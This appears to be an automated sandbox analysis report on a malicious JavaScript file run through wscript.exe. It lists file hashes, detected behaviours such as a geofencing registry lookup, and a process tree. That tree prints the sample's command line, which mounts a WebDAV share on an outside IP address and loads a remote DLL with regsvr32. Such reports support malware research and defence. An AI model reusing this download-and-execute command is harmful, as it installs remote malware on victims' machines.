Analysis
-
max time kernel
135s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
119511705361626824.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
119511705361626824.js
Resource
win10v2004-20240709-en
General
-
Target
119511705361626824.js
-
Size
6KB
-
MD5
648035df333ebe1a0e6fcbae9a23cefe
-
SHA1
4b92508edb592083e4049e048a39f37b9c932f35
-
SHA256
905181fc8929d12655a84250c0f188a3f76e3719e3c49aeba551fb18aade2b98
-
SHA512
ab679650e0d9e371580880db9611b74e66a4b19fd5d8e566eb215829a99aac7cf1c2179fa3a44b489c5c1792f5e5cbe77e95cdb7f1b261619f417da564cff771
-
SSDEEP
48:glq22ZQGbE0ReU5Gl6Jc1QMM8cjaEOcC71SCC9BU09SfF0YMcxiVvLRjVZLftBlr:hH+SVvRlLF4nWAks9QanWV
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2080 wrote to memory of 3960 2080 wscript.exe 84 PID 2080 wrote to memory of 3960 2080 wscript.exe 84 PID 3960 wrote to memory of 4912 3960 cmd.exe 86 PID 3960 wrote to memory of 4912 3960 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\119511705361626824.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\26626252363855.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:4912
-
-